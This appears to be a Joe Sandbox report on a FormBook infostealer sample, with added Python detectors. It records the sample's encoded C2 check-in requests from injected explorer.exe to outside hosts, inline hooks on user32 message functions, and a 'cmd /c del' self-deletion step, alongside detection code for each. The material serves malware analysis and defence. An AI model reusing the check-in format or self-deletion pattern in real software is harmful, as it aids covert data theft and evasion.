                                                                                    Data Raw: 66 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 57 41 53 56 4e 32 46 6b 78 38 4c 7a 37 37 61 52 59 64 69 51 67 71 36 4d 44 67 47 41 73 6a 30 51 62 52 35 75 71 6e 52 71 37 56 58 46 30 50 30 52 48 69 7a 46 56 4b 50 73 4f 6b 58 38 36 64 50 4f 53 37 4c 39 46 65 71 62 52 4b 48 46 4e 63 6c 6d 37 63 38 52 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 
6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                                    Data Ascii: ff9<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CWASVN2Fkx8Lz77aRYdiQgq6MDgGAsj0QbR5uqnRq7VXF0P0RHizFVKPsOkX86dPOS7L9FeqbRKHFNclm7c8RQ=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49720 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 12:14:18.417414904 CEST | 5097 | OUT | GET /dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e HTTP/1.1
                                                                                    Host: www.shitarpa.net
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
Jun 11, 2021 12:14:18.562024117 CEST | 5098 | IN | HTTP/1.1 403 Forbidden
                                                                                    Server: openresty
                                                                                    Date: Fri, 11 Jun 2021 10:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 275
                                                                                    ETag: "60ba4131-113"
                                                                                    Via: 1.1 google
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49722 | 170.39.76.111 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 12:14:39.094999075 CEST | 5110 | OUT | GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT HTTP/1.1
                                                                                    Host: www.houseofsisson.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
Jun 11, 2021 12:14:39.417160988 CEST | 5114 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-Redirect-By: WordPress
                                                                                    Location: http://houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT
                                                                                    Content-Length: 0
                                                                                    Date: Fri, 11 Jun 2021 10:14:39 GMT
                                                                                    Server: LiteSpeed
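Both sessions have the same shape: a GET from explorer.exe to a short path (/dxe/) with two opaque query parameters (one long base64-like value, one nine-character value, in either order), a seven-byte all-NUL body on a GET, Connection: close on every request, and an answer from an unrelated web host (a parked page behind openresty/Google returning 403, a WordPress site returning 301). FormBook walks a list of domains of which most are decoys, so the host name is a weak indicator and the request shape is the stable one. The Python below is an added example, not part of the Joe Sandbox report: it rebuilds the two requests from the session data above (including the seven NUL bytes shown in Data Raw), adds two constructed benign requests for contrast, and flags records that match the shape. The path-length and value-length thresholds are assumptions chosen to fit these two requests, not a published signature.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Records of (source process, destination IP, raw request bytes). The first two are rebuilt
# from sessions 1 and 2 above, including the seven NUL bytes in Data Raw; the last two are
# constructed benign requests used for contrast.
SAMPLE_REQUESTS: List[Tuple[str, str, bytes]] = [
    ("C:\\Windows\\explorer.exe", "34.102.136.180",
     b"GET /dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk"
     b"&Wj0xll=4hH838s0e HTTP/1.1\r\nHost: www.shitarpa.net\r\nConnection: close\r\n\r\n" + b"\x00" * 7),
    ("C:\\Windows\\explorer.exe", "170.39.76.111",
     b"GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT"
     b" HTTP/1.1\r\nHost: www.houseofsisson.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7),
    ("C:\\Program Files\\Browser\\browser.exe", "93.184.216.34",
     b"GET /search?q=formbook&page=2 HTTP/1.1\r\nHost: www.example.com\r\nConnection: keep-alive\r\n\r\n"),
    ("C:\\Program Files\\Updater\\updater.exe", "93.184.216.34",
     b"GET /api/?id=12345&token=abcdef HTTP/1.1\r\nHost: updates.example.com\r\nConnection: close\r\n\r\n"),
]


@dataclass
class HttpRequest:
    method: str
    uri: str
    headers: Dict[str, str]   # header names lower-cased
    body: bytes


# Thresholds are assumptions fitted to the two requests above.
PATH_RE = re.compile(r"^/([A-Za-z0-9]{2,6})/\?([^ ]*)$")       # short directory, then a query
LONG_VALUE_RE = re.compile(r"^[A-Za-z0-9+/=_-]{40,}$")          # opaque, base64-like payload
SHORT_VALUE_RE = re.compile(r"^[A-Za-z0-9]{6,12}$")             # short campaign-style token


def parse_raw_request(raw: bytes) -> HttpRequest:
    """Split a raw HTTP/1.1 request into request line, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, uri, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, uri, headers, body)


def checkin_reasons(req: HttpRequest) -> List[str]:
    """Return the matched features, or an empty list when the request does not fit the shape."""
    m = PATH_RE.match(req.uri)
    if not m:
        return []
    values = [v for _, sep, v in (p.partition("=") for p in m.group(2).split("&")) if sep]
    if len(values) != 2:
        return []
    if not (any(LONG_VALUE_RE.match(v) for v in values) and any(SHORT_VALUE_RE.match(v) for v in values)):
        return []
    reasons = [f"short path /{m.group(1)}/ with one long opaque and one short query value"]
    # A GET normally has no body; here it carries a run of NUL bytes.
    if req.method == "GET" and req.body and set(req.body) == {0}:
        reasons.append(f"GET carrying {len(req.body)} NUL bytes as body")
    if req.headers.get("connection", "").lower() == "close":
        reasons.append("Connection: close")
    return reasons


def scan(records: List[Tuple[str, str, bytes]]) -> List[Tuple[str, str, str, str]]:
    """Return (process, host, destination IP, reasons) for every record that matches."""
    hits = []
    for process, dst, raw in records:
        req = parse_raw_request(raw)
        reasons = checkin_reasons(req)
        if reasons:
            hits.append((process, req.headers.get("host", dst), dst, "; ".join(reasons)))
    return hits


if __name__ == "__main__":
    for process, host, dst, why in scan(SAMPLE_REQUESTS):
        print(f"{process} -> {host} ({dst}): {why}")
```

Pair the network hit with the originating process, as the Process column above does: the two matches come from explorer.exe, which is not where an HTTP client with a hand-built request would normally live. Tune the length thresholds on real traffic before deploying, and expect the decoy hosts to answer with whatever their parked page or CMS returns, as the 403 and 301 above show.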


                                                                                    Code Manipulations

                                                                                    User Modules

                                                                                    Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

                                                                                    Processes

                                                                                    Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE2
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE2
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE2
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE2
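The four inline hooks sit on the message-loop functions explorer.exe calls continuously, which is how the injected code gets a turn to run. The bytes in the New Data column do not begin with any of the usual detour shapes (E9 jmp rel32, FF 25 jmp [rip+disp32], mov rax,imm64 / jmp rax, push imm32 / ret), so a scanner that only looks for trampoline opcodes would not flag them; comparing the first bytes of each export inside the target process against the same export's bytes on disk does not depend on the opcode. The Python below is an added example, not from the report: the in-memory side is the six bytes listed above, the on-disk prologues are constructed stand-ins (real user32.dll prologues differ), and MessageBoxA is a constructed unhooked control. On a live host the memory side comes from ReadProcessMemory or a memory dump at the export's RVA plus the loaded image base, and the disk side from the file mapped at the same RVA.

```python
from typing import Dict, List, NamedTuple

# In-process bytes exactly as the "New Data" column lists them for explorer.exe.
# MessageBoxA is a constructed, unhooked export used as a control.
HOOKED_IN_MEMORY: Dict[str, bytes] = {
    "PeekMessageA": bytes.fromhex("48 8b b8 85 5e e2"),
    "PeekMessageW": bytes.fromhex("48 8b b8 8d de e2"),
    "GetMessageW":  bytes.fromhex("48 8b b8 8d de e2"),
    "GetMessageA":  bytes.fromhex("48 8b b8 85 5e e2"),
    "MessageBoxA":  bytes.fromhex("48 83 ec 38 45 33 db"),
}

# Constructed stand-ins for the same exports as read from user32.dll on disk. These are NOT
# the real prologues; on a live host read them from the file mapped at the export's RVA.
ON_DISK: Dict[str, bytes] = {
    "PeekMessageA": bytes.fromhex("48 83 ec 38 48 8b 05"),
    "PeekMessageW": bytes.fromhex("48 83 ec 38 48 8b 05"),
    "GetMessageW":  bytes.fromhex("48 89 5c 24 08 57 48"),
    "GetMessageA":  bytes.fromhex("48 89 5c 24 08 57 48"),
    "MessageBoxA":  bytes.fromhex("48 83 ec 38 45 33 db"),
}


class Finding(NamedTuple):
    export: str
    disk: str      # hex of the expected prologue bytes
    memory: str    # hex of what the process actually holds
    shape: str     # recognised trampoline shape, or "unrecognised"


def classify_patch(b: bytes) -> str:
    """Name the detour shape at the start of b, if it is one of the common ones."""
    if b[:1] == b"\xe9":
        return "jmp rel32"
    if b[:2] == b"\xff\x25":
        return "jmp [rip+disp32]"
    if b[:2] == b"\x48\xb8" and b[10:12] == b"\xff\xe0":
        return "mov rax, imm64; jmp rax"
    if b[:1] == b"\x68" and b[5:6] == b"\xc3":
        return "push imm32; ret"
    if b[:1] == b"\xeb":
        return "jmp rel8"
    return "unrecognised"


def diff_prologues(disk: Dict[str, bytes], memory: Dict[str, bytes], n: int = 6) -> List[Finding]:
    """Report every export whose first n bytes in memory differ from the on-disk copy.

    The comparison is byte-for-byte, so it catches patches that do not start with a
    recognisable jump, which is exactly the case for the four hooks in this report.
    """
    findings: List[Finding] = []
    for name, mem in sorted(memory.items()):
        expected = disk.get(name)
        if expected is None:
            continue                      # export not present on disk: nothing to compare
        if mem[:n] != expected[:n]:
            findings.append(Finding(name, expected[:n].hex(" "), mem[:n].hex(" "), classify_patch(mem)))
    return findings


if __name__ == "__main__":
    for f in diff_prologues(ON_DISK, HOOKED_IN_MEMORY):
        print(f"{f.export:14s} disk={f.disk}  memory={f.memory}  shape={f.shape}")
```

Two caveats for real use: compare after relocation (x64 prologues are normally relocation-free, but 32-bit modules are not), and diff against a known-good baseline of the same machine rather than the file alone, because EDR agents and application-compatibility shims install legitimate inline hooks on the same exports.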

                                                                                    Statistics

                                                                                    Behavior


                                                                                    System Behavior

                                                                                    General

                                                                                    Start time:12:12:43
                                                                                    Start date:11/06/2021
                                                                                    Path:C:\Users\user\Desktop\2435.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\2435.exe'
                                                                                    Imagebase:0x400000
                                                                                    File size:241748 bytes
                                                                                    MD5 hash:862B4C2ABAD2C07AC13D5E051C18AB86
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:12:12:44
                                                                                    Start date:11/06/2021
                                                                                    Path:C:\Users\user\Desktop\2435.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\2435.exe'
                                                                                    Imagebase:0x400000
                                                                                    File size:241748 bytes
                                                                                    MD5 hash:862B4C2ABAD2C07AC13D5E051C18AB86
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:12:12:49
                                                                                    Start date:11/06/2021
                                                                                    Path:C:\Windows\explorer.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:
                                                                                    Imagebase:0x7ff693d90000
                                                                                    File size:3933184 bytes
                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:12:13:09
                                                                                    Start date:11/06/2021
                                                                                    Path:C:\Windows\SysWOW64\control.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\control.exe
                                                                                    Imagebase:0x340000
                                                                                    File size:114688 bytes
                                                                                    MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:moderate

                                                                                    General

                                                                                    Start time:12:13:14
                                                                                    Start date:11/06/2021
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:/c del 'C:\Users\user\Desktop\2435.exe'
                                                                                    Imagebase:0xeb0000
                                                                                    File size:232960 bytes
                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:12:13:15
                                                                                    Start date:11/06/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7ecfc0000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
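Read top to bottom, the six process blocks are the execution chain: the sample starts a second copy of itself (the second 2435.exe, whose Yara matches sit at its image base 0x400000), code ends up in the 64-bit explorer.exe, a 32-bit system utility (SysWOW64\control.exe) appears with a bare command line, and cmd.exe runs /c del against the original sample path to remove it from disk. The Python below is an added example, not part of the report: it replays the six blocks as constructed process-creation events (image, command line, start time and WOW64 flag are taken from the blocks; PIDs and parent links are assumptions, since the report lists neither) and applies three checks a process-tree rule would express. The sandbox renders command-line quotes as single quotes, so the del pattern accepts either quote style.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    time: str        # HH:MM:SS, from the block's "Start time"
    pid: int         # assumed; the report does not list PIDs
    ppid: int        # assumed parent, 0 when unknown
    image: str
    cmdline: str
    wow64: bool


# Constructed from the six "General" blocks above. PIDs and parent links are assumptions
# made to illustrate the checks; images, command lines, times and WOW64 flags are the report's.
EVENTS: List[ProcEvent] = [
    ProcEvent("12:12:43", 4100, 2000, r"C:\Users\user\Desktop\2435.exe", r"'C:\Users\user\Desktop\2435.exe'", True),
    ProcEvent("12:12:44", 4116, 4100, r"C:\Users\user\Desktop\2435.exe", r"'C:\Users\user\Desktop\2435.exe'", True),
    ProcEvent("12:12:49", 2000, 0,    r"C:\Windows\explorer.exe", "", False),
    ProcEvent("12:13:09", 5120, 2000, r"C:\Windows\SysWOW64\control.exe", r"C:\Windows\SysWOW64\control.exe", True),
    ProcEvent("12:13:14", 5204, 5120, r"C:\Windows\SysWOW64\cmd.exe", r"/c del 'C:\Users\user\Desktop\2435.exe'", True),
    ProcEvent("12:13:15", 5216, 5204, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", False),
]

# "/c del [switches] <path>" with the path in double quotes, single quotes or bare.
DEL_RE = re.compile(r"""/c\s+del\s+(?:/\w+\s+)*["']?([^"']+?)["']?\s*$""", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyse(events: List[ProcEvent]) -> List[Tuple[int, str, str]]:
    """Return (pid, signal, detail) for every check that fires on the tree."""
    by_pid = {e.pid: e for e in events}
    findings: List[Tuple[int, str, str]] = []
    for e in events:
        parent = by_pid.get(e.ppid)

        # 1. A child with the same image as its parent: what process hollowing looks like
        #    from the outside (the parent starts itself suspended and overwrites the image).
        if parent and parent.image.lower() == e.image.lower():
            findings.append((e.pid, "self-spawn", f"{basename(e.image)} started a second copy of itself"))

        # 2. cmd /c del whose target is the image of a process already seen in this tree.
        if basename(e.image) == "cmd.exe":
            m = DEL_RE.search(e.cmdline)
            if m:
                target = m.group(1).strip().lower()
                victims = [p.pid for p in events if p.image.lower() == target and p.time <= e.time]
                if victims:
                    findings.append((e.pid, "self-delete", f"deletes {target}, image of pid(s) {victims}"))

        # 3. A 32-bit system utility started with a bare command line. Weak on its own;
        #    it is the pivot FormBook uses to run cmd.exe outside the injected explorer.exe.
        if "\\syswow64\\" in e.image.lower() and e.cmdline.strip().strip("'\"").lower() == e.image.lower():
            who = basename(parent.image) if parent else "unknown"
            findings.append((e.pid, "bare-syswow64-utility", f"{basename(e.image)} with no arguments, parent {who}"))
    return findings


if __name__ == "__main__":
    for pid, signal, detail in analyse(EVENTS):
        print(f"pid {pid}: {signal}: {detail}")
```

On a real endpoint the same three checks run over Sysmon event ID 1 or the equivalent EDR process-creation stream, where ParentProcessId and ProcessId are present and do not have to be assumed; the self-delete check is the highest-confidence one, because a legitimate installer deleting its own binary through cmd.exe from a control-panel process is not something a baseline produces.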

                                                                                    Disassembly

                                                                                    Code Analysis
